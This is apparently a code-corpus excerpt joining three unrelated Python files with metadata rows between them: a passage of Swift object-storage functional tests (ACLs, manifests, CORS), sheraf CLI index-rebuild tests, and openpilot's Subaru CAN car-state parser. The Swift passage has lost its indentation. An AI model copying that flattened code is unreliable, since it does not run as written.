resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertIn(resp.status, (204, 404))
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(obj_name, listing)
self.assertNotIn(self.obj, listing)
@requires_acls
def test_admin(self):
if tf.skip3:
raise SkipTest
def get_listing(url, token, parsed, conn):
conn.request('GET', '%s/%s' % (parsed.path, self.container), '',
{'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, name), 'test',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', '%s/%s/%s' % (
parsed.path, self.container, name), '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list objects
resp = retry(get_listing, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# cannot get object
resp = retry(get, self.obj, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant admin access
acl_user = tf.swift_test_user[2]
acl = {'admin': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# can list objects
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.obj, listing)
# can get object
resp = retry(get, self.obj, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'test')
# can put an object
obj_name = str(uuid4())
resp = retry(put, obj_name, use_account=3)
body = resp.read()
self.assertEqual(resp.status, 201)
# can delete an object
resp = retry(delete, self.obj, use_account=3)
body = resp.read()
self.assertIn(resp.status, (204, 404))
# sanity with account1
resp = retry(get_listing, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(obj_name, listing)
self.assertNotIn(self.obj, listing)
def test_manifest(self):
if tf.skip:
raise SkipTest
# Data for the object segments
segments1 = ['one', 'two', 'three', 'four', 'five']
segments2 = ['six', 'seven', 'eight']
segments3 = ['nine', 'ten', 'eleven']
# Upload the first set of segments
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments1/%s' % (
parsed.path, self.container, str(objnum)), segments1[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments1)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Upload the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments1/' % self.container,
'Content-Type': 'text/jibberish', 'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
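        # The zero-byte object carrying 'X-Object-Manifest: <container>/<prefix>'
        # is a dynamic large object: a GET on it streams the concatenation of
        # every object whose name starts with that prefix, as checked below.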
# Get the manifest (should get all the segments as the body)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1))
self.assertEqual(resp.status, 200)
self.assertEqual(resp.getheader('content-type'), 'text/jibberish')
# Get with a range at the start of the second segment
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=3-'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1[1:]))
self.assertEqual(resp.status, 206)
# Get with a range in the middle of the second segment
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=5-'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1)[5:])
self.assertEqual(resp.status, 206)
# Get with a full start and stop range
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token, 'Range': 'bytes=5-10'})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1)[5:11])
self.assertEqual(resp.status, 206)
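        # For reference: ''.join(segments1) is 'onetwothreefourfive' (19 bytes),
        # and HTTP ranges are inclusive, so 'bytes=5-10' yields the six bytes at
        # indexes 5..10, i.e. ''.join(segments1)[5:11].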
# Upload the second set of segments
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments2/%s' % (
parsed.path, self.container, str(objnum)), segments2[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments2)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest (should still be the first segments of course)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments1))
self.assertEqual(resp.status, 200)
# Update the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '', {
'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments2/' % self.container,
'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest (should be the second set of segments now)
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments2))
self.assertEqual(resp.status, 200)
if not tf.skip3:
# Ensure we can't access the manifest with the third account
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Grant access to the third account
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# The third account should be able to get the manifest now
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
self.assertEqual(resp.read(), ''.join(segments2))
self.assertEqual(resp.status, 200)
# Create another container for the third set of segments
acontainer = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', parsed.path + '/' + acontainer, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Upload the third set of segments in the other container
def put(url, token, parsed, conn, objnum):
conn.request('PUT', '%s/%s/segments3/%s' % (
parsed.path, acontainer, str(objnum)), segments3[objnum],
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments3)):
resp = retry(put, objnum)
resp.read()
self.assertEqual(resp.status, 201)
# Update the manifest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/manifest' % (
parsed.path, self.container), '',
{'X-Auth-Token': token,
'X-Object-Manifest': '%s/segments3/' % acontainer,
'Content-Length': '0'})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
# Get the manifest to ensure it's the third set of segments
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get)
self.assertEqual(resp.read(), ''.join(segments3))
self.assertEqual(resp.status, 200)
if not tf.skip3:
# Ensure we can't access the manifest with the third account
# (because the segments are in a protected container even if the
# manifest itself is not).
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# Grant access to the third account
def post(url, token, parsed, conn):
conn.request('POST', '%s/%s' % (parsed.path, acontainer),
'', {'X-Auth-Token': token,
'X-Container-Read': tf.swift_test_perm[2]})
return check_response(conn)
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 204)
# The third account should be able to get the manifest now
def get(url, token, parsed, conn):
conn.request('GET', '%s/%s/manifest' % (
parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
self.assertEqual(resp.read(), ''.join(segments3))
self.assertEqual(resp.status, 200)
# Delete the manifest
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/manifest' % (
parsed.path,
self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the third set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments3/%s' % (
parsed.path, acontainer, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments3)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the second set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments2/%s' % (
parsed.path, self.container, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments2)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the first set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments1/%s' % (
parsed.path, self.container, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments1)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the extra container
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, acontainer), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_delete_content_type(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/hi' % (parsed.path, self.container),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/hi' % (parsed.path, self.container),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
self.assertEqual(resp.getheader('Content-Type'),
'text/html; charset=UTF-8')
def test_delete_if_delete_at_bad(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT',
'%s/%s/hi-delete-bad' % (parsed.path, self.container),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def delete(url, token, parsed, conn):
            conn.request('DELETE', '%s/%s/hi-delete-bad' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-If-Delete-At': 'bad'})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 400)
def test_null_name(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/abc%%00def' % (
parsed.path,
self.container), 'test', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
if (tf.web_front_end == 'apache2'):
self.assertEqual(resp.status, 404)
else:
self.assertEqual(resp.read(), 'Invalid UTF8 or contains NULL')
self.assertEqual(resp.status, 412)
def test_cors(self):
if tf.skip:
raise SkipTest
try:
strict_cors = tf.cluster_info['swift']['strict_cors_mode']
except KeyError:
raise SkipTest("cors mode is unknown")
def put_cors_cont(url, token, parsed, conn, orig):
conn.request(
'PUT', '%s/%s' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-Container-Meta-Access-Control-Allow-Origin': orig})
return check_response(conn)
def put_obj(url, token, parsed, conn, obj):
conn.request(
'PUT', '%s/%s/%s' % (parsed.path, self.container, obj),
'test', {'X-Auth-Token': token})
return check_response(conn)
def check_cors(url, token, parsed, conn,
method, obj, headers):
if method != 'OPTIONS':
headers['X-Auth-Token'] = token
conn.request(
method, '%s/%s/%s' % (parsed.path, self.container, obj),
'', headers)
return conn.getresponse()
resp = retry(put_cors_cont, '*')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(put_obj, 'cat')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(check_cors,
'OPTIONS', 'cat', {'Origin': 'http://m.com'})
self.assertEqual(resp.status, 401)
resp = retry(check_cors,
'OPTIONS', 'cat',
{'Origin': 'http://m.com',
'Access-Control-Request-Method': 'GET'})
self.assertEqual(resp.status, 200)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com',
'X-Web-Mode': 'True'})
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
####################
resp = retry(put_cors_cont, 'http://secret.com')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(check_cors,
'OPTIONS', 'cat',
{'Origin': 'http://m.com',
'Access-Control-Request-Method': 'GET'})
resp.read()
self.assertEqual(resp.status, 401)
if strict_cors:
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertNotIn('access-control-allow-origin', headers)
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://secret.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'http://secret.com')
else:
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'http://m.com')
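        # In short: preflight is only accepted from the configured origin, and
        # for actual GETs strict_cors_mode withholds the CORS headers from other
        # origins while non-strict mode echoes the request Origin back.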
@requires_policies
def test_cross_policy_copy(self):
# create container in first policy
policy = self.policies.select()
container = self._create_container(
headers={'X-Storage-Policy': policy['name']})
obj = uuid4().hex
# create a container in second policy
other_policy = self.policies.exclude(name=policy['name']).select()
other_container = self._create_container(
headers={'X-Storage-Policy': other_policy['name']})
other_obj = uuid4().hex
def put_obj(url, token, parsed, conn, container, obj):
# to keep track of things, use the original path as the body
content = '%s/%s' % (container, obj)
path = '%s/%s' % (parsed.path, content)
conn.request('PUT', path, content, {'X-Auth-Token': token})
return check_response(conn)
# create objects
for c, o in zip((container, other_container), (obj, other_obj)):
resp = retry(put_obj, c, o)
resp.read()
self.assertEqual(resp.status, 201)
def put_copy_from(url, token, parsed, conn, container, obj, source):
dest_path = '%s/%s/%s' % (parsed.path, container, obj)
conn.request('PUT', dest_path, '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': source})
return check_response(conn)
copy_requests = (
(container, other_obj, '%s/%s' % (other_container, other_obj)),
(other_container, obj, '%s/%s' % (container, obj)),
)
# copy objects
for c, o, source in copy_requests:
resp = retry(put_copy_from, c, o, source)
resp.read()
self.assertEqual(resp.status, 201)
def get_obj(url, token, parsed, conn, container, obj):
path = '%s/%s/%s' % (parsed.path, container, obj)
conn.request('GET', path, '', {'X-Auth-Token': token})
return check_response(conn)
# validate contents, contents should be source
validate_requests = copy_requests
for c, o, body in validate_requests:
resp = retry(get_obj, c, o)
self.assertEqual(resp.status, 200)
self.assertEqual(body, resp.read())
if __name__ == '__main__':
unittest2.main()
| 37.619249
| 79
| 0.525078
|
e6be50b4825d1d47f14ea525eb7f25a4a9bb0a68
| 5,359
|
py
|
Python
|
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
import re
import sheraf
from click.testing import CliRunner
from sheraf.cli import cli
class CliModel(sheraf.Model):
table = "climymodel"
foo = sheraf.StringAttribute().index()
boo = sheraf.StringAttribute().index()
def test_healthcheck_conflict_resolution(sheraf_zeo_database):
with sheraf.connection(commit=True):
CliModel.create(foo="bar")
runner = CliRunner()
result = runner.invoke(
cli, [f"{sheraf_zeo_database.uri}&database_name=cli", "check", "tests.test_cli"]
)
assert result.exit_code == 0, result.output
assert "check_model_index" in result.output
assert "check_attributes_index" in result.output
assert re.search(r"tests.test_cli.CliModel[^\n]*0[^\n]*1", result.output)
def test_rebuild_all_models_all_indexes(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[f"{sheraf_zeo_database.uri}&database_name=cli", "rebuild", "tests.test_cli"],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_all_models_one_index(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" not in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_one_model_all_index(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli.CliModel",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_savepoint(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
def test_rebuild_commit(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
"--commit",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
def test_rebuild_fork(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
"--fork",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
| 29.284153
| 88
| 0.591715
|
176018f54b057f8d07b980313c543fba4fe9fcf2
| 7,735
|
py
|
Python
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 23
|
2018-08-17T11:02:00.000Z
|
2020-12-23T01:46:44.000Z
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 2
|
2020-04-14T22:39:11.000Z
|
2020-05-03T19:17:40.000Z
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 44
|
2018-07-31T04:26:19.000Z
|
2021-01-08T22:46:30.000Z
|
import copy
from selfdrive.config import Conversions as CV
from selfdrive.car.interfaces import CarStateBase
from opendbc.can.parser import CANParser
from selfdrive.car.subaru.values import CAR, DBC, STEER_THRESHOLD
def get_powertrain_can_parser(CP):
# this function generates lists for signal, messages and initial values
signals = [
# sig_name, sig_address, default
("Steer_Torque_Sensor", "Steering_Torque", 0),
("Steering_Angle", "Steering_Torque", 0),
("Cruise_On", "CruiseControl", 0),
("Cruise_Activated", "CruiseControl", 0),
("Brake_Pedal", "Brake_Pedal", 0),
("Throttle_Pedal", "Throttle", 0),
("LEFT_BLINKER", "Dashlights", 0),
("RIGHT_BLINKER", "Dashlights", 0),
("SEATBELT_FL", "Dashlights", 0),
("FL", "Wheel_Speeds", 0),
("FR", "Wheel_Speeds", 0),
("RL", "Wheel_Speeds", 0),
("RR", "Wheel_Speeds", 0),
("DOOR_OPEN_FR", "BodyInfo", 1),
("DOOR_OPEN_FL", "BodyInfo", 1),
("DOOR_OPEN_RR", "BodyInfo", 1),
("DOOR_OPEN_RL", "BodyInfo", 1),
]
checks = [
# sig_address, frequency
("Dashlights", 10),
("Wheel_Speeds", 50),
("Steering_Torque", 50),
]
if CP.carFingerprint == CAR.IMPREZA:
signals += [
("Units", "Dash_State", 1),
]
checks += [
("BodyInfo", 10),
("CruiseControl", 20),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
signals += [
("LKA_Lockout", "Steering_Torque", 0),
]
checks += [
("CruiseControl", 50),
]
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, 0)
def get_camera_can_parser(CP):
signals = [
]
checks = [
]
if CP.carFingerprint == CAR.IMPREZA:
signals += [
("Cruise_Set_Speed", "ES_DashStatus", 0),
("Counter", "ES_Distance", 0),
("Signal1", "ES_Distance", 0),
("Signal2", "ES_Distance", 0),
("Main", "ES_Distance", 0),
("Signal3", "ES_Distance", 0),
("Checksum", "ES_LKAS_State", 0),
("Counter", "ES_LKAS_State", 0),
("Keep_Hands_On_Wheel", "ES_LKAS_State", 0),
("Empty_Box", "ES_LKAS_State", 0),
("Signal1", "ES_LKAS_State", 0),
("LKAS_ACTIVE", "ES_LKAS_State", 0),
("Signal2", "ES_LKAS_State", 0),
("Backward_Speed_Limit_Menu", "ES_LKAS_State", 0),
("LKAS_ENABLE_3", "ES_LKAS_State", 0),
("Signal3", "ES_LKAS_State", 0),
("LKAS_ENABLE_2", "ES_LKAS_State", 0),
("Signal4", "ES_LKAS_State", 0),
("LKAS_Left_Line_Visible", "ES_LKAS_State", 0),
("Signal6", "ES_LKAS_State", 0),
("LKAS_Right_Line_Visible", "ES_LKAS_State", 0),
("Signal7", "ES_LKAS_State", 0),
("FCW_Cont_Beep", "ES_LKAS_State", 0),
("FCW_Repeated_Beep", "ES_LKAS_State", 0),
("Throttle_Management_Activated", "ES_LKAS_State", 0),
("Traffic_light_Ahead", "ES_LKAS_State", 0),
("Right_Depart", "ES_LKAS_State", 0),
("Signal5", "ES_LKAS_State", 0),
]
checks += [
("ES_DashStatus", 10),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
signals += [
("Brake_On", "ES_CruiseThrottle", 0),
("Button", "ES_CruiseThrottle", 0),
("CloseDistance", "ES_CruiseThrottle", 0),
("Counter", "ES_CruiseThrottle", 0),
("Cruise_Activatedish", "ES_CruiseThrottle", 0),
("DistanceSwap", "ES_CruiseThrottle", 0),
("ES_Error", "ES_CruiseThrottle", 0),
("NEW_SIGNAL_1", "ES_CruiseThrottle", 0),
("Unknown", "ES_CruiseThrottle", 0),
("SET_0_1", "ES_CruiseThrottle", 0),
("SET_0_2", "ES_CruiseThrottle", 0),
("SET_0_3", "ES_CruiseThrottle", 0),
("SET_0_4", "ES_CruiseThrottle", 0),
("SET_1", "ES_CruiseThrottle", 0),
("SET_2", "ES_CruiseThrottle", 0),
("NEW_SIGNAL_9", "ES_CruiseThrottle", 0),
("Standstill", "ES_CruiseThrottle", 0),
("Standstill_2", "ES_CruiseThrottle", 0),
("Throttle_Cruise", "ES_CruiseThrottle", 0),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY]:
signals += [
("Not_Ready_Startup", "ES_DashStatus", 0),
("Cruise_Set_Speed", "ES_DashStatus", 0),
]
checks += [
("ES_DashStatus", 10),
]
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, 2)
class CarState(CarStateBase):
def __init__(self, CP):
super().__init__(CP)
    # initialize blinker debounce counters
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
def update(self, cp, cp_cam):
self.pedal_gas = cp.vl["Throttle"]['Throttle_Pedal']
self.brake_pressure = cp.vl["Brake_Pedal"]['Brake_Pedal']
self.user_gas_pressed = self.pedal_gas > 0
self.brake_pressed = self.brake_pressure > 0
self.brake_lights = bool(self.brake_pressed)
self.v_wheel_fl = cp.vl["Wheel_Speeds"]['FL'] * CV.KPH_TO_MS
self.v_wheel_fr = cp.vl["Wheel_Speeds"]['FR'] * CV.KPH_TO_MS
self.v_wheel_rl = cp.vl["Wheel_Speeds"]['RL'] * CV.KPH_TO_MS
self.v_wheel_rr = cp.vl["Wheel_Speeds"]['RR'] * CV.KPH_TO_MS
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]['Cruise_Set_Speed']
self.v_ego_raw = (self.v_wheel_fl + self.v_wheel_fr + self.v_wheel_rl + self.v_wheel_rr) / 4.
    # Kalman filter, even though Subaru raw wheel speed is heavily filtered by default
self.v_ego, self.a_ego = self.update_speed_kf(self.v_ego_raw)
self.standstill = self.v_ego_raw < 0.01
self.prev_left_blinker_on = self.left_blinker_on
self.prev_right_blinker_on = self.right_blinker_on
# continuous blinker signals for assisted lane change
self.left_blinker_cnt = 50 if cp.vl["Dashlights"]['LEFT_BLINKER'] else max(self.left_blinker_cnt - 1, 0)
self.left_blinker_on = self.left_blinker_cnt > 0
self.right_blinker_cnt = 50 if cp.vl["Dashlights"]['RIGHT_BLINKER'] else max(self.right_blinker_cnt - 1, 0)
self.right_blinker_on = self.right_blinker_cnt > 0
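    # the counters above keep each blinker reported as on for 50 consecutive
    # update() calls after the dash signal clears, which provides the steady
    # signal that assisted lane change relies on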
self.steer_torque_driver = cp.vl["Steering_Torque"]['Steer_Torque_Sensor']
self.acc_active = cp.vl["CruiseControl"]['Cruise_Activated']
self.main_on = cp.vl["CruiseControl"]['Cruise_On']
self.steer_override = abs(self.steer_torque_driver) > STEER_THRESHOLD[self.car_fingerprint]
self.angle_steers = cp.vl["Steering_Torque"]['Steering_Angle']
self.door_open = any([cp.vl["BodyInfo"]['DOOR_OPEN_RR'],
cp.vl["BodyInfo"]['DOOR_OPEN_RL'],
cp.vl["BodyInfo"]['DOOR_OPEN_FR'],
cp.vl["BodyInfo"]['DOOR_OPEN_FL']])
if self.car_fingerprint == CAR.IMPREZA:
self.seatbelt_unlatched = cp.vl["Dashlights"]['SEATBELT_FL'] == 1
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]["Cruise_Set_Speed"] * CV.MPH_TO_KPH
self.steer_not_allowed = 0
self.es_distance_msg = copy.copy(cp_cam.vl["ES_Distance"])
self.es_lkas_msg = copy.copy(cp_cam.vl["ES_LKAS_State"])
# 1 = imperial, 6 = metric
if cp.vl["Dash_State"]['Units'] == 1:
self.v_cruise_pcm *= CV.MPH_TO_KPH
if self.car_fingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
self.seatbelt_unlatched = False # FIXME: stock ACC disengages on unlatch so this is fine for now, signal has not yet been found
self.steer_not_allowed = cp.vl["Steering_Torque"]["LKA_Lockout"]
self.button = cp_cam.vl["ES_CruiseThrottle"]["Button"]
self.brake_hold = cp_cam.vl["ES_CruiseThrottle"]["Standstill"]
self.close_distance = cp_cam.vl["ES_CruiseThrottle"]["CloseDistance"]
self.es_accel_msg = copy.copy(cp_cam.vl["ES_CruiseThrottle"])
if self.car_fingerprint in [CAR.FORESTER]:
self.v_cruise_pcm = 0
self.ready = True
if self.car_fingerprint in [CAR.OUTBACK, CAR.LEGACY]:
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]["Cruise_Set_Speed"]
